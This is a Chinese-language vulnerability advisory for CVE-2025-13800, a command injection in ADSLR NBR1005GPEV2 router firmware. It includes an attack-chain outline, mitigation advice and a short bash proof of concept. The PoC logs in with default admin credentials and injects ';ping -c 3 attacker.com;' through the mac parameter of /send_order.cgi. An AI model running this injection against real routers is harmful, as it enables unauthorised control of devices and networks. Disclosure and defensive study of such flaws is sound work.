CVE-2025-13800 CVSS 6.3 中危

CVE-2025-13800 ADSLR NBR1005GPEV2路由器set_mesh_disconnect命令注入漏洞

披露日期: 2025-12-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13800

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ADSLR NBR1005GPEV2 250814-r037c

漏洞概述

CVE-2025-13800是影响ADSLR NBR1005GPEV2路由器250814-r037c固件版本的安全漏洞。该漏洞位于Web管理接口的/send_order.cgi文件中，具体位于set_mesh_disconnect函数。攻击者可以通过操控mac参数实现操作系统命令注入，从而在受影响设备上执行任意系统命令。由于该漏洞可通过网络远程利用，且只需低权限认证即可触发，对使用该设备的家庭和企业网络构成中等程度的安全风险。漏洞利用代码已公开，厂商在收到安全通知后未作出任何回应，导致该漏洞长期存在且无官方修复方案。攻击者可能利用此漏洞完全控制路由器设备，进行流量劫持、DNS篡改或进一步渗透内网。

技术细节

该命令注入漏洞源于/send_order.cgi中的set_mesh_disconnect函数对mac参数缺乏有效的输入验证。攻击者可通过构造包含系统命令的恶意mac参数值（如使用分号、管道符或反引号等Shell元字符），使底层系统调用执行额外的操作系统命令。CVSS 3.1评分6.3（AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L）表明攻击者可通过网络远程发起攻击，无需高权限认证。漏洞影响路由器的Mesh网络断开功能，攻击者可能利用此功能破坏网络拓扑或获取设备控制权。由于路由器通常作为网络边界设备，此漏洞可被用于横向移动至内网其他设备。建议用户立即停止使用受影响版本，并等待厂商发布安全更新。

攻击链分析

STEP 1

步骤1

攻击者识别目标路由器型号为ADSLR NBR1005GPEV2，访问其Web管理界面

STEP 2

步骤2

使用默认凭证或低权限账户登录Web管理界面获取会话cookie

STEP 3

步骤3

构造包含Shell命令的恶意mac参数，使用分号、管道符等元字符注入额外命令

STEP 4

步骤4

发送特制请求到/send_order.cgi，触发set_mesh_disconnect函数中的命令注入

STEP 5

步骤5

注入的命令以root权限在路由器操作系统上执行，攻击者获得设备完全控制权

STEP 6

步骤6

攻击者可进一步利用路由器作为跳板，横向移动至内网其他设备或进行流量劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-13800 PoC - ADSLR NBR1005GPEV2 Command Injection
# Target: /send_order.cgi - set_mesh_disconnect function

TARGET="http://TARGET_IP"
USERNAME="admin"
PASSWORD="admin"

# Authenticate and get session cookie
COOKIES=$(curl -s -c - -d "username=$USERNAME&password=$PASSWORD" "$TARGET/login.cgi" | grep PHPSESSID | awk '{print $NF}')

# Command injection via mac parameter
# Using ping command as simple test
PAYLOAD=";ping -c 3 attacker.com;"

echo "[*] Sending malicious request..."
curl -s -b "PHPSESSID=$COOKIES" \
  -d "function=set_mesh_disconnect&mac=$PAYLOAD" \
  "$TARGET/send_order.cgi"

echo "[*] Check attacker.com logs for ICMP packets"

影响范围

ADSLR NBR1005GPEV2 250814-r037c及之前版本

防御指南

临时缓解措施

由于厂商未回应安全通知且无官方修复方案，建议采取以下临时措施：1）立即停止使用受影响的路由器设备；2）将Web管理界面访问限制为受信任的本地网络；3）使用强密码并定期更换管理员凭证；4）监控设备日志和网络流量以检测潜在攻击；5）如条件允许，考虑更换为具有安全更新支持的其他品牌路由器；6）在边界防火墙上阻断对路由器管理接口的非授权访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13800
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13800
3 Details https://www.cvedetails.com/cve/CVE-2025-13800/
4 VulDB https://vuldb.com/cve/CVE-2025-13800
5 Link https://vuldb.com/?ctiid.333811
6 Link https://vuldb.com/?id.333811
7 Link https://vuldb.com/?submit.691942
8 Link https://www.notion.so/2a70c75766a88023aa0ed833ff0239e1

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表